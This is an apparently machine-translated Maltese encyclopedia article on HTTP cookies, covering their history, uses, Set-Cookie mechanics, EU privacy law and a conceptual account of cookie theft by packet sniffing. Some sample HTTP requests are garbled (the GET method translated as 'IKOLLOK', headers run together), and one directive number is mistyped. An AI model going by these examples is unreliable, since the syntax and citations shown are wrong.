Cookie tal-Internet: X'inhu? Definizzjoni, Oriġini, Tipi u Privatezza

Un cookie jew cookie tal-web (Jew cookie, imqassar bħala xhud fil-Quebec) hija definita mill-protokoll ta’ komunikazzjoni HTTP bħala sekwenza ta’ informazzjoni mibgħuta minn server HTTP lil klijent HTTP, li dan tal-aħħar jirritorna kull darba li l-istess server HTTP jiġi mistoqsi taħt ċerti kundizzjonijiet.

Il-cookie hija l-ekwivalenti ta' a fajl ta' test żgħir maħżun fit-terminal tal-utent tal-Internet. Eżistenti għal aktar minn 20 sena, jippermettu lill-iżviluppaturi tal-websajts jaħżnu d-dejta tal-utent sabiex jiffaċilitaw in-navigazzjoni tagħhom u jippermettu ċerti funzjonalitajiet. Il-cookies dejjem kienu xi ftit jew wisq kontroversjali minħabba li fihom informazzjoni personali residwa li potenzjalment tista’ tiġi sfruttata minn partijiet terzi.

Tintbagħat bħala header HTTP mis-server tal-web lill-brawżer tal-web li jirritornaha mhux mibdula kull darba li taċċessa s-server. Cookie tista 'tintuża biex awtentikazzjoni, sessjoni (manteniment mill-istat), u għal jaħżen informazzjoni speċifika dwar l-utent, bħall-preferenzi tas-sit jew il-kontenut ta 'karrettun tax-xiri elettroniku. It-terminu cookie huwa derivat minn cookie magic, kunċett magħruf fil-kompjuters UNIX, li ispira l-idea u l-isem tal-cookies tal-browser. Jeżistu ftit alternattivi għall-cookies, kull wieħed bl-użi, il-vantaġġi u l-iżvantaġġi tagħhom.

Billi huma fajls ta' test sempliċi, il-cookies mhumiex eżekutibbli. Huma mhumiex la spyware u lanqas viruses, għalkemm il-cookies minn xi siti huma skoperti minn ħafna softwer kontra l-virus minħabba li jippermettu lill-utenti jiġu ssorveljati meta jżuru siti multipli. 

Ħafna mill-browsers moderni jippermettu lill-utenti tiddeċiedi jekk taċċettax jew tirrifjutax cookies. L-utenti jistgħu wkoll agħżel kemm il-cookies jibqgħu maħżuna. Madankollu, ir-rifjut sħiħ tal-cookies jagħmel xi siti inutilizzabbli. Per eżempju, aħżen karretti tax-xiri jew siti li jeħtieġu login billi tuża kredenzjali (username u password).

Historical

It-terminu cookie ġej mit-terminu Ingliż cookie magic, li huwa pakkett ta' dejta li programm jirċievi u jirritorna mhux mibdul. Il-cookies kienu diġà użati fl-IT meta Lou Montulli kellu l-idea li jużahom fil-komunikazzjonijiet tal-web f'Ġunju 1994. Dak iż-żmien, kien impjegat minn Netscape Communications, li kienet żviluppat applikazzjoni għall-kummerċ elettroniku għal klijent. Il-cookies taw soluzzjoni għall-problema tal-affidabbiltà tal-implimentazzjoni tal-shopping cart virtwali ta 'maħżen.

John Giannandrea u Lou Montulli kitbu l-ewwel speċifikazzjoni tal-cookie ta’ Netscape dik l-istess sena. Verżjoni 0.9 beta ta' Mosaic Netscape, rilaxxata fit-13 ta' Ottubru 1994, integrata teknoloġija tal-cookie (ara post). L-ewwel użu (mhux sperimentali) tal-cookies kien biex jiġi ddeterminat jekk il-viżitaturi tal-websajt Netscape kinux żaru s-sit qabel. Montulli ressqet applikazzjoni għal privattiva għat-teknoloġija tal-cookies fl-1995, u l-privattiva Amerikana 5774670 ingħatat. mogħtija fl-1998.

Wara li ġew implimentati f'Netscape 0.9 beta fl-1994, il-cookies ġew integrati fl-Internet Explorer 2, rilaxxat f'Ottubru 1995.

L-introduzzjoni tal-cookies għadha ma kinitx magħrufa ħafna mill-pubbliku. B'mod partikolari, il-cookies ġew aċċettati awtomatikament fis-settings tal-browser, u l-utenti ma ġewx infurmati bil-preżenza tagħhom. Xi nies kienu konxji tal-eżistenza tal-cookies madwar l-ewwel kwart tal-1995, iżda l-pubbliku ġenerali ħa l-eżistenza tagħhom biss wara li l-Financial Times ippubblikat artiklu fit-12 ta’ Frar, 1996. Fl-istess sena, il-cookies irċevew ħafna attenzjoni tal-midja minħabba intrużjonijiet possibbli fil-privatezza. Is-suġġett tal-cookies ġie diskuss f'żewġ konsultazzjonijiet tal-Kummissjoni Federali tal-Kummerċ Amerikana fl-1996 u fl-1997.

L-iżvilupp tal-ispeċifikazzjoni uffiċjali tal-cookie kien diġà għaddej. L-ewwel diskussjonijiet tal-ispeċifikazzjoni uffiċjali saru f'April 1995 fuq il-lista tal-posta www-talk. Ġie ffurmat grupp ta' ħidma speċjali tal-IETF. Żewġ proposti alternattivi għall-introduzzjoni tat-tranżazzjonijiet tal-istat għal HTTP ġew proposti minn Brian Behlendorf u David Kristol rispettivament, iżda l-grupp, immexxi minn Kristol innifsu, iddeċieda li juża l-ispeċifikazzjoni ta 'Netscape bħala punt tat-tluq. Fi Frar 1996, il-grupp ta’ ħidma ddetermina li l-cookies ta’ partijiet terzi kienu theddida sinifikanti għall-privatezza. L-ispeċifikazzjoni prodotta mill-grupp eventwalment ġiet ippubblikata bħala RFC 2109.

Mill-aħħar tal-2014, naraw banner dwar il-cookies fuq bosta siti. Hemm mill-inqas estensjoni waħda tal-browser li tippermetti l- banner mhux murija.

Tipi ta' Cookies u Użi

Ġestjoni tas-sessjoni

Il-cookies jistgħu jintużaw biex tinżamm id-dejta tal-utent waqt in-navigazzjoni, iżda wkoll matul żjarat multipli. Il-cookies ġew introdotti biex jipprovdu mezz ta’ implimentazzjoni ta’ shopping carts elettroniċi, apparat virtwali li fih l-utent jista’ jakkumula l-oġġetti li jrid jixtri waqt li jfittex is-sit.

Dawn il-ġranet, apps bħal shopping carts minflok jaħżnu l-lista ta 'oġġetti f'database fuq server, li huwa preferibbli; milli ssalvahom fil-cookie innifsu. Is-server tal-web jibgħat cookie li jkun fiha ID unika tas-sessjoni. Il-web browser imbagħad jirritorna din l-ID tas-sessjoni fuq kull talba sussegwenti u l-oġġetti fil-basket jiġu ssejvjati u assoċjati ma’ din l-istess ID unika tas-sessjoni.

L-użu frekwenti tal-cookies huwa utli biex tidħol f'sit bl-użu tal-kredenzjali. Fil-qosor, is-server tal-web l-ewwel jibgħat cookie li jkun fiha ID unika tas-sessjoni. Imbagħad l-utenti jipprovdu l-kredenzjali tagħhom (ġeneralment username u password). L-applikazzjoni tal-web imbagħad jawtentika s-sessjoni u tippermetti lill-utent jaċċessa s-servizz.

personalizzazzjoni

Il-cookies jistgħu jintużaw biex jiftakru informazzjoni dwar l-utent ta’ sit, sabiex juruh kontenut xieraq fil-futur. Pereżempju, server tal-web jista’ jibgħat cookie li jkun fiha l-aħħar isem tal-utent użat biex tidħol f’dik il-websajt, sabiex dak l-isem tal-utent ikun jista’ jkun imniżżel minn qabel fi żjarat futuri.

Ħafna websajts jużaw cookies għall-personalizzazzjoni abbażi tal-preferenzi tal-utent. L-utenti jagħżlu l-preferenzi tagħhom f'forma u jissottomettuhom lis-server. Is-server jikkodifika l-preferenzi f'cookie u jibgħatha lura lill-browser. Sussegwentement, kull darba li l-utent jaċċessa paġna ta’ dan is-sit, il-browser jirritorna l-cookie u għalhekk il-lista tal-preferenzi; is-server jista 'mbagħad jippersonalizza l-paġna skont il-preferenzi tal-utent. Pereżempju, il-websajt tal-Wikipedija tippermetti lill-utenti tagħha jagħżlu l-ġilda tas-sit li jippreferu. Il-magna tat-tiftix Google tippermetti lill-utenti tagħha (anke jekk mhumiex reġistrati) li jagħżlu n-numru ta 'riżultati li jridu jaraw f'kull paġna tar-riżultati.

Traċċar

Il-cookies tat-traċċar jintużaw biex jintraċċaw id-drawwiet tal-ibbrawżjar tal-utenti tal-internet. Dan jista 'jsir ukoll parzjalment billi tuża l-indirizz IP tal-kompjuter li jagħmel talba għal paġna jew billi tuża l-header HTTP 'referrer' li l-klijent jibgħat ma' kull talba, iżda l-cookies jippermettu preċiżjoni akbar. Dan jista' jsir bħal fl-eżempju li ġej:

1. Jekk l-utent isejjaħ paġna fuq sit, u t-talba ma jkunx fiha cookie, is-server jassumi li din hija l-ewwel paġna li jżuru l-utent. Is-server imbagħad joħloq string każwali u jibgħatha lill-browser flimkien mal-paġna mitluba.
2. Minn dan il-mument, il-cookie se tintbagħat awtomatikament mill-browser kull darba li tissejjaħ paġna ġdida tas-sit. Is-server jibgħat il-paġna bħas-soltu, iżda se jilloggja wkoll il-URL tal-paġna msejħa, id-data, il-ħin tat-talba u l-cookie f'fajl tal-ġurnal.

Billi tħares lejn il-log file, imbagħad ikun possibbli li tara liema paġni żar l-utent u f'liema ordni. Pereżempju, jekk il-fajl ikun fih ftit talbiet magħmula bl-użu tal-cookie id=abc, dan jista' jistabbilixxi li dawn it-talbiet kollha jiġu mill-istess utent. Il-URL mitlub, id-data u l-ħin assoċjati mat-talbiet jippermettu li l-ibbrawżjar tal-utent jiġi ssorveljat.

Il-cookies u l-web beacons ta’ partijiet terzi, spjegati hawn taħt, jippermettu wkoll it-traċċar f’siti differenti. It-traċċar ta' sit wieħed ġeneralment jintuża għal skopijiet ta' statistika. B'kuntrast, it-traċċar f'siti differenti li jużaw cookies ta' partijiet terzi ġeneralment jintuża minn kumpaniji tar-reklamar biex jipproduċu profili anonimi tal-utent (li mbagħad jintużaw biex jiddeterminaw liema reklami għandhom jintwerew lill-utent kif ukoll biex jibagħtulu emails li jikkorrispondu għal dawn ir-reklami - SPAM ).

Il-cookies tat-traċċar huma riskju ta’ invażjoni tal-privatezza tal-utent iżda jistgħu jitħassru faċilment. Il-biċċa l-kbira tal-browsers moderni jinkludu għażla biex awtomatikament iħassru cookies persistenti meta jagħlqu l-applikazzjoni.

Cookies ta’ partijiet terzi

Immaġini u oġġetti oħra li jinsabu f'paġna web jistgħu jgħixu fuq servers differenti minn dak li jospita l-paġna. Biex turi l-paġna, il-browser iniżżel dawn l-oġġetti kollha. Ħafna mill-websajts fihom informazzjoni minn sorsi differenti. Pereżempju, jekk ittajpja www.example.com fil-browser tiegħek, ħafna drabi jkun hemm oġġetti jew reklami fuq parti mill-paġna li ġejjin minn sorsi differenti, jiġifieri minn dominju differenti minn www. .example.com. Il-cookies tal-"ewwel parti" huma cookies li huma stabbiliti mid-dominju elenkat fil-bar tal-indirizz tal-browser. Il-cookies ta’ partijiet terzi huma stabbiliti minn wieħed mill-oġġetti tal-paġna li ġej minn dominju differenti.

B'mod awtomatiku, browsers bħal Mozilla Firefox, Microsoft Internet Explorer u Opera jaċċettaw cookies ta' partijiet terzi, iżda l-utenti jistgħu jibdlu s-settings fl-għażliet tal-browser biex jimblokkawhom. M'hemm l-ebda riskju ta' sigurtà inerenti fil-cookies ta' partijiet terzi li jippermettu l-funzjonalità tal-web, madankollu jintużaw ukoll biex jintraċċaw l-utenti. minn sit għal sit.

Għodod bħal Ghostery disponibbli għall-browsers kollha inkluż Google Chrome jistgħu jimblukkaw l-iskambji bejn partijiet terzi.

Implimentazzjoni

Il-cookies huma biċċiet żgħar ta’ dejta mibgħuta mis-server tal-web lill-browser. Il-browser jirritornahom mhux mibdula lis-server, u jintroduċi stat (memorja ta 'avvenimenti tal-passat) fit-tranżazzjoni HTTP mingħajr stat. Mingħajr cookies, kull irkupru ta' paġna web jew komponent ta' paġna web huwa avveniment iżolat, indipendenti minn talbiet oħra magħmula lill-istess sit. Minbarra li jistgħu jiġu ssettjati mis-server tal-web, il-cookies jistgħu jiġu ssettjati wkoll b'lingwi ta' skripting bħal JavaScript, jekk appoġġjati u awtorizzati mill-browser.

L-ispeċifikazzjoni uffiċjali tal-cookies tissuġġerixxi li l-browsers għandhom ikunu jistgħu jiffrankaw u jibagħtu mill-ġdid numru minimu ta’ cookies. Speċifikament, browser għandu jkun jista' jaħżen mill-inqas 300 cookie ta' erba' kilobytes kull wieħed, u mill-inqas 20 cookie għal server jew dominju wieħed.

Skont it-taqsima 3.1 ta’ RFC 2965, l-ismijiet tal-cookies huma insensittivi għall-każ.

Cookie tista’ tispeċifika d-data tal-iskadenza tagħha, f’liema każ il-cookie titħassar f’din id-data. Jekk il-cookie ma tispeċifikax data ta' skadenza, il-cookie titħassar hekk kif l-utent iħalli l-browser tiegħu. Għalhekk, li tispeċifika data ta 'skadenza hija mod kif il-cookie tibqa' ħaj permezz ta 'sessjonijiet multipli. Għal din ir-raġuni, il-cookies b'data ta' skadenza jingħad li huma persistenti. Eżempju ta' applikazzjoni: sit tal-bejgħ bl-imnut jista' juża cookies persistenti biex jirreġistra l-oġġetti li l-utenti jkunu poġġew fil-karrettun tax-xiri tagħhom (fir-realtà, il-cookie tista' tirreferi għal entrata ssejvjata f'database fuq is-sit tal-bejgħ, u mhux fil-kompjuter tiegħek) . Permezz ta’ dan il-mezz, jekk l-utenti jħallu l-browser tagħhom mingħajr ma jagħmlu xirja u jerġgħu lura għalih aktar tard, ikunu jistgħu jerġgħu jsibu l-oġġetti fil-karrettun. Jekk dawn il-cookies ma tawx data ta’ skadenza, jiskadu meta l-browser jingħalaq, u l-informazzjoni dwar il-kontenut tal-basket tintilef.

Il-cookies jistgħu jkunu limitati fl-ambitu għal dominju speċifiku, sottodominju jew mogħdija fuq is-server li ħolquhom.

Ħolqien ta' cookie

It-trasferiment tal-paġni tal-web isir bl-użu tal-HyperText Transfer Protocol (HTTP). Billi jinjoraw il-cookies, il-browsers isejħu paġna minn web servers billi ġeneralment jibagħtulhom test qasir imsejjaħ Talba HTTP. Pereżempju, biex jaċċessaw il-paġna www.example.org/index.html, il-browsers jikkonnettjaw mas-server www.example.org u jibagħtu talba li tidher bħal din:

	IKOLLOK /index.html HTTP/1.1Host: www.example.org
navigator	→	serveur

Is-server jirrispondi billi jibgħat il-paġna mitluba, preċeduta minn test simili, is-sieħeb kollu Risposta HTTP. Dan il-pakkett jista' jkun fih linji li jagħtu struzzjonijiet lill-browser biex jaħżen il-cookies:

	HTTP/1.1 200 OKContent-type: text/htmlSet-Cookie: name=value (paġna HTML)
navigator	←	serveur

Is-server jibgħat biss il-linja Set-Cookie, jekk is-server irid li l-browser jaħżen cookie. Set-Cookie hija talba għall-browser biex jaħżen is-sekwenza tal-isem=valur u jirritornaha fit-talbiet futuri kollha lis-server. Jekk il-browser jappoġġa l-cookies u l-cookies huma attivati ​​fl-għażliet tal-browser, il-cookie tkun inkluża fit-talbiet sussegwenti kollha li jsiru lill-istess server. Pereżempju, il-browser isejjaħ il-paġna www.example.org/news.html billi jibgħat it-talba li ġejja lis-server www.example.org:

	IKOLLOK /news.html HTTP/1.1Host: www.example.orgCookie: name=valueAccept: */*
navigator	→	serveur

Din hija talba għal paġna oħra mill-istess server, u hija differenti mill-ewwel hawn fuq minħabba li fiha string li s-server qabel bagħat lill-browser. Grazzi għal dan il-mezz, is-server jaf li din it-talba hija marbuta ma' dik preċedenti. Is-server jirrispondi billi jibgħat il-paġna msejħa, u wkoll billi jżid cookies oħra magħha.

Il-valur tal-cookie jista' jinbidel mis-server billi tibgħat linja ġdida Set-Cookie: name=new_value bi tweġiba għall-paġna msejħa. Il-browser imbagħad jissostitwixxi l-valur l-antik b'wieħed ġdid.

Il-linja Set-Cookie normalment tinħoloq minn programm CGI jew lingwa oħra ta 'scripting, mhux mis-server HTTP. Is-server HTTP (eżempju: Apache) se jittrasmetti biss ir-riżultat tal-programm (dokument preċedut mill-header li fih il-cookies) lill-browser.

Il-cookies jistgħu wkoll jiġu ssettjati minn JavaScript jew lingwi simili oħra li jaħdmu fil-browser, jiġifieri fuq in-naħa tal-klijent aktar milli fuq in-naħa tas-server. Fil-JavaScript, l-oġġett document.cookie jintuża għal dan il-għan. Pereżempju, id-dikjarazzjoni document.cookie = "temperatura=20" toħloq cookie bl-isem "temperatura" u b'valur ta' 20.

Attributi ta' cookie

Minbarra l-par isem/valur, cookie jista’ jkun fiha wkoll data ta’ skadenza, mogħdija, isem ta’ dominju u t-tip ta’ konnessjoni maħsuba, jiġifieri normali jew kriptat. RFC 2965 jiddefinixxi wkoll li l-cookies għandu jkollhom numru ta' verżjoni obbligatorju, iżda dan ġeneralment jitħalla barra. Dawn il-partijiet tad-dejta jsegwu l-par name=new_value u huma separati b'punti u virgola. Pereżempju, cookie tista’ tinħoloq mis-server billi tibgħat linja Set-Cookie: name=new_value; jiskadi=data; mogħdija=/; domain=.example.org.

Skadenza ta' cookie

Il-cookies jiskadu u mbagħad ma jintbagħtux mill-browser lis-server fis-sitwazzjonijiet li ġejjin:

• Meta l-browser jingħalaq, jekk il-cookie ma tkunx persistenti.
• Meta d-data tal-iskadenza tal-cookie tkun għaddiet.
• Meta d-data tal-iskadenza tal-cookie tinbidel (mis-server jew mill-iskritt) għal data fil-passat.
• Meta l-browser iħassar il-cookie fuq talba tal-utent.

It-tielet sitwazzjoni tippermetti lis-servers jew l-iskripts iħassru cookie b'mod espliċitu. Innota li huwa possibbli bil-web browser Google Chrome li tkun taf id-data ta 'skadenza ta' cookie partikolari billi taċċessa s-settings tal-kontenut. Cookie ssejvjata fuq kompjuter tista' tajjeb ħafna tibqa' hemm għal diversi għexieren ta' snin jekk ma tittieħed l-ebda proċedura biex titħassarha.

Stereotipi

Mill-introduzzjoni tagħhom fuq l-Internet, ħafna ideat dwar il-cookies iċċirkolaw fuq l-Internet u fil-midja. Fl-1998, CIAC, tim tal-monitoraġġ tal-inċidenti tal-kompjuter tad-Dipartiment tal-Enerġija tal-Istati Uniti, iddetermina li l-vulnerabbiltajiet tas-sigurtà tal-cookies kienu "essenzjalment ineżistenti" u spjega li "informazzjoni dwar l-oriġini taż-żjarat tiegħek u d-dettalji tal-paġni tal-web li żort diġà jeżistu fil-log files tal-web servers”. Fl-2005, Jupiter Research ippubblikat ir-riżultati ta 'studju, li fih persentaġġ sinifikanti ta' dawk li wieġbu kkunsidraw id-dikjarazzjonijiet li ġejjin:

• Cookies huma simili virus, jinfettaw il-hard drives tal-utenti.
• Il-cookies jiġġeneraw pop-up.
• Il-cookies jintużaw biex jintbagħtu ispam.
• Il-cookies jintużaw biss għar-reklamar.

Il-cookies ma jistgħux iħassru jew jaqraw informazzjoni mill-kompjuter tal-utent. Madankollu, il-cookies jagħmluha possibbli li jinstabu l-paġni tal-web li jżuru utent fuq sit partikolari jew sett ta’ siti. Din l-informazzjoni tista' tinġabar fi profil tal-utent li jista' jintuża jew jinbiegħ mill-ġdid lil partijiet terzi, li jista' joħloq kwistjonijiet serji ta' privatezza. Xi profili huma anonimi, fis-sens li ma fihom ebda informazzjoni personali, iżda anke profili bħal dawn jistgħu jkunu dubjużi.

Skont l-istess studju, persentaġġ kbir ta’ utenti tal-Internet ma jafux kif iħassru l-cookies. Waħda mir-raġunijiet għaliex in-nies ma jafdawx il-cookies hija li xi siti abbużaw mill-aspett ta' identifikazzjoni personali tal-cookies u qasmu din l-informazzjoni ma' sorsi oħra. Perċentwal kbir ta' reklamar immirat u email mhux mitluba, meqjusa bħala spam, ġej minn informazzjoni miġbura minn tracking cookies.

Issettjar tal-browser

Ħafna mill-browsers jappoġġjaw il-cookies u jippermettu lill-utent li jiskonnettjahom. L-aktar għażliet komuni huma:

• Ippermetti jew tiddiżattiva l-cookies kompletament, sabiex jiġu aċċettati jew imblukkati kontinwament.
• Ħalli lill-utent jara l-cookies attivi f'paġna partikolari, billi jdaħħal javascript: alert(document.cookie) fil-bar tal-indirizz tal-browser. Xi browsers jinkorporaw cookie manager għall-utent li jista’ jara u jħassar b’mod selettiv cookies li bħalissa huma maħżuna mill-browser.

Ħafna mill-browsers jippermettu wkoll it-tħassir sħiħ tad-dejta personali li tinkludi l-cookies. Jeżistu wkoll moduli addizzjonali biex jikkontrollaw il-permessi tal-cookies.

Privatezza u Cookies ta’ Partijiet Terzi

F'dan l-eżempju fittizju, kumpanija tar-reklamar poġġiet banners fuq żewġ websajts. Billi tospita l-banners fuq is-servers tagħha u tuża cookies ta’ partijiet terzi, il-kumpanija tar-reklamar tista’ ssegwi n-navigazzjoni tal-utent permezz ta’ dawn iż-żewġ siti.

Il-cookies għandhom implikazzjonijiet importanti għall-privatezza u l-anonimità tal-utenti tal-web. Għalkemm il-cookies jintbagħtu lura biss lis-server li ssettjahom jew lil server li jappartjeni għall-istess dominju tal-Internet, paġna web jista' madankollu jkun fiha immaġini jew komponenti oħra maħżuna fuq servers li jappartjenu għal oqsma oħra. Il-cookies li huma stabbiliti waqt l-irkupru ta 'dawn il-komponenti esterni jissejħu cookies ta’ partijiet terzi. Dan jinkludi cookies minn twieqi pop-up mhux mixtieqa.

Kumpaniji tar-reklamar jużaw cookies ta’ partijiet terzi biex isegwu l-utenti fuq is-siti differenti li jżuru. B'mod partikolari, kumpanija tar-reklamar tista' ssegwi utent fil-paġni kollha fejn tkun poġġiet immaġini ta' reklamar jew pixel ta' traċċar. L-għarfien tal-paġni miżjura mill-utent jippermetti lill-kumpanija tar-reklamar li timmira l-preferenzi tar-reklamar tal-utent.

Il-ħila li jinbena profil tal-utent hija meqjusa minn xi wħud bħala invażjoni tal-privatezza, speċjalment meta l-intraċċar isir f'dominji differenti bl-użu ta 'cookies ta' partijiet terzi. Għal din ir-raġuni, xi pajjiżi għandhom leġiżlazzjoni dwar il-cookies.

Il-gvern tal-Istati Uniti implimenta regoli stretti dwar it-tqegħid tal-cookies fl-2000, wara li ġie żvelat li l-White House Drug Policy Office kien qed juża cookies biex isegwi l-kompjuters tal-utenti li jaraw reklami tad-droga onlajn. Fl-2002, l-attivist tal-privatezza Daniel Brandt skopra li s-CIA ħalliet cookies persistenti fuq kompjuters li kienu żaru l-websajts tagħha. Ladarba ġiet infurmata b’dan il-ksur, is-CIA ddikjarat li dawn il-cookies ma ntbagħtux intenzjonalment u waqfet issettjarhom. Fil-25 ta’ Diċembru 2005, Brandt skopra li l-Aġenzija tas-Sigurtà Nazzjonali (NSA) kienet ħalliet żewġ cookies persistenti fuq il-kompjuters tal-viżitaturi minħabba aġġornament tas-softwer. Wara li ġiet notifikata, l-NSA immedjatament iddiżattivat il-cookies.

Fir-Renju Unit, il- Liġi tal-cookies “, li daħlet fis-seħħ fil-25 ta’ Mejju 2012, tobbliga lis-siti jiddikjaraw l-intenzjonijiet tagħhom, biex b’hekk l-utenti jkunu jistgħu jagħżlu jekk iridux iħallu traċċi jew le tal-passaġġ tagħhom fuq l-Internet. B'hekk jistgħu jiġu protetti mill-immirar tar-reklamar. Madankollu, skond The Guardian, il-kunsens tal-utenti tal-Internet mhux neċessarjament espliċitu; saru bidliet fit-termini tal-kunsens tal-utent, u dan isir hekk implikat.

Direttiva 2002/58 dwar il-privatezza

Id-Direttiva 202/58 dwar il-privatezza u l-komunikazzjonijiet elettroniċi, fiha regoli dwar l-użu tal-cookies. B'mod partikolari, l-artikolu 5, paragrafu 3 ta' din id-direttiva jeħtieġ li l-ħażna ta' data (bħal cookies) fil-kompjuter tal-utent tista' ssir biss jekk:

• l-utent ikun infurmat dwar kif tintuża d-data;
• l-utent jingħata l-għażla li jirrifjuta din l-operazzjoni tal-ħażna. Madankollu, dan l-artikolu jgħid ukoll li l-ħażna tad-data għal raġunijiet tekniċi hija eżenti minn din il-liġi.

Minħabba li kellha tiġi implimentata minn Ottubru 2003, id-direttiva twettqet biss b'mod imperfett fil-prattika skont rapport ta' Diċembru 2004, li rrimarka wkoll li ċerti Stati Membri (is-Slovakkja, il-Latvja, il-Greċja, il-Belġju u l-Lussemburgu) kienu għadhom ma ttrasponewx il- direttiva fil-liġi domestika.

Skont l-opinjoni tal-G29 fl-2010, din id-direttiva, li notevolment tikkundizzjona l-użu tal-cookies għal skopijiet ta’ reklamar komportamentali, dwar il-kunsens espliċitu tal-utent tal-Internet għadha applikata ħażin ħafna. Fil-fatt, il-biċċa l-kbira tas-siti jagħmlu dan b'mod li ma jikkonformax mad-direttiva, billi jillimitaw ruħhom għal sempliċi "banner" li jinforma dwar l-użu ta' "cookies" mingħajr ma jagħtu informazzjoni dwar l-użi, mingħajr ma jiddifferenzjaw bejn cookies "tekniċi". cookies ta '"traċċar", u lanqas li joffru għażla reali lill-utent li jixtieq iżomm cookies tekniċi (bħal cookies ta' ġestjoni tal-karrettun tax-xiri) u jirrifjuta cookies ta '"traċċar". Fil-fatt, ħafna siti ma jaħdmux b'mod korrett jekk il-cookies jiġu rrifjutati, li ma jikkonformax mad-direttiva 2002/58 jew id-direttiva 95/46 (Protezzjoni tad-data personali).

Direttiva 2009 / 136 / CE

Dan il-materjal ġie aġġornat bid-Direttiva 2009/136/KE tal-25 ta’ Novembru, 2009 li tgħid li l-“ħażna ta’ informazzjoni, jew il-ksib ta’ aċċess għal informazzjoni diġà maħżuna, fit-tagħmir terminali ta’ abbonat jew utent huwa permess biss bil-kundizzjoni li l- abbonat jew utent ikun ta l-kunsens tiegħu, wara li jkun irċieva, f’konformità mad-Direttiva 95/46/KE, informazzjoni ċara u kompleta, bejn oħrajn dwar l-iskopijiet tal-ipproċessar”. Id-direttiva l-ġdida għalhekk issaħħaħ l-obbligi qabel ma jitqiegħdu cookies fuq il-kompjuter tal-utent tal-Internet.

Fil-kunsiderazzjonijiet preliminari tad-direttiva, il-leġiżlatur Ewropew jispeċifika madankollu: “Fejn teknikament possibbli u effettiv, skont id-dispożizzjonijiet rilevanti tad-Direttiva 95/46/KE, il-kunsens tal-utent fir-rigward tal-ipproċessar jista’ jiġi espress permezz tal- użu tas-settings xierqa ta’ browser jew applikazzjoni oħra”. Iżda fil-fatt, l-ebda browser sal-lum ma jagħmilha possibbli li jiġu dissoċjati l-cookies tekniċi essenzjali minn dawk fakultattivi li għandhom jitħallew għall-għażla tal-utent.

Din id-direttiva l-ġdida ġiet trasposta mill-Membri Parlamentari Belġjani f'Lulju 2012. Studju tal-2014 juri li anke l-Membri Parlamentari qed ibatu biex japplikaw ir-restrizzjonijiet tad-direttiva.

P3P

L-ispeċifikazzjoni P3P tinkludi l-abbiltà għal server li jiddikjara politika ta 'privatezza, li tiddefinixxi x'tip ta' informazzjoni jiġbor u għal liema skop. Dawn il-politiki jinkludu (iżda mhumiex limitati għal) l-użu ta’ informazzjoni miġbura bl-użu tal-cookies. Skont id-definizzjonijiet ta 'P3P, browser jista' jaċċetta jew jirrifjuta l-cookies billi jqabbel il-politiki tal-privatezza mal-preferenzi tal-utent jew billi jistaqsi lill-utent, jippreżenta d-dikjarazzjoni tal-privatezza tal-politika tal-privatezza ddikjarata mis-server.

Ħafna browsers, inklużi Apple Safari u Microsoft Internet Explorer verżjonijiet 6 u 7, jappoġġjaw P3P li jippermetti lill-browser biex jiddetermina jekk jaċċettax ħażna ta 'cookie ta' parti terza. Il-browser Opera jippermetti lill-utenti jirrifjutaw cookies ta’ partijiet terzi u joħolqu profil ta’ sigurtà globali u speċifiku għad-dominji tal-Internet. Il-verżjoni 2 ta' Mozilla Firefox waqgħet l-appoġġ P3P iżda reġgħet daħħalha fil-verżjoni 3.

Il-cookies ta’ partijiet terzi jistgħu jiġu mblukkati mill-biċċa l-kbira tal-browsers biex tiżdied il-privatezza u jitnaqqas it-traċċar tar-reklami, mingħajr ma jaffettwaw b’mod negattiv l-esperjenza tal-web tal-utent. Ħafna aġenziji tar-reklamar joffru għażla opt out għal reklamar immirat, billi titwaqqaf cookie ġenerika fil-browser li tiddiżattiva dan l-immirar, iżda soluzzjoni bħal din mhijiex prattikament effettiva, meta tiġi rispettata, għaliex din il-cookie ġenerika titħassar malli l-utent iħassar dawn il-cookies li jikkanċella l-opt. barra deċiżjoni.

Żvantaġġi tal-cookies

Minbarra kwistjonijiet ta' privatezza, il-cookies għandhom ukoll xi żvantaġġi tekniċi. B'mod partikolari, mhux dejjem jidentifikaw b'mod preċiż l-utenti, jistgħu jnaqqsu l-prestazzjoni tas-sit meta f'numri kbar, jistgħu jintużaw għal attakki ta 'sigurtà, u huma f'kunflitt mat-trasferiment tal-istat rappreżentattiv, stil arkitettoniku tas-softwer.

Identifikazzjoni impreċiża

Jekk jintuża aktar minn browser wieħed fuq kompjuter, f'kull wieħed minnhom dejjem ikun hemm unità ta' ħażna separata għall-cookies. Il-cookies għalhekk ma jidentifikawx persuna, iżda l-kombinazzjoni ta 'kont tal-utent, kompjuter, u web browser. Għalhekk, kulħadd jista 'juża dawn il-kontijiet, kompjuters, jew browsers li għandhom il-panoplija ta' cookies. Bl-istess mod, il-cookies ma jagħmlux differenza bejn utenti multipli li jaqsmu l-istess kont tal-utent, kompjuter, u browser, bħal f'"internet cafes" jew kwalunkwe post li jagħti aċċess b'xejn għar-riżorsi tal-kompjuter.

Iżda fil-prattika din id-dikjarazzjoni tirriżulta li hija fallaċi fil-maġġoranza tal-każijiet għaliex illum kompjuter "personali" (jew smartphone, jew tablet, li huwa agħar) jintuża prinċipalment minn individwu wieħed.Dan jammonta biex jimmira persuna speċifika u permezz tal-volum ta 'informazzjoni miġbura jaslu għal mira personalizzata anki jekk il-persuna mhix "jiġifieri" identifikata.

Serq ta' cookies

Cookie tista’ tinsteraq minn kompjuter ieħor fin-netwerk.

Waqt it-tħaddim normali, il-cookies jintbagħtu lura bejn is-server (jew grupp ta’ servers fl-istess dominju) u l-browser tal-kompjuter tal-utent. Peress li l-cookies jista 'jkun fihom informazzjoni sensittiva (username, password użata għall-awtentikazzjoni, eċċ.), il-valuri tagħhom m'għandhomx ikunu aċċessibbli għal kompjuters oħra. Is-serq tal-cookies huwa att ta’ interċettazzjoni tal-cookies minn parti terza mhux awtorizzata.

Il-cookies jistgħu jinsterqu permezz ta' packet sniffer f'attakk imsejjaħ session hijacking. It-traffiku fuq in-net jista 'jiġi interċettat u jinqara minn kompjuters minbarra dawk li jibagħtu u jirċievu (speċjalment fuq l-ispazju Wi-Fi pubbliku mhux kriptat). Dan it-traffiku jinkludi cookies mibgħuta fuq sessjonijiet bl-użu tal-protokoll HTTP sempliċi. Meta t-traffiku tan-netwerk ma jkunx encrypted, utenti malizzjużi jistgħu għalhekk jaqraw il-komunikazzjonijiet ta 'utenti oħra fuq in-netwerk billi jużaw "packet sniffers".

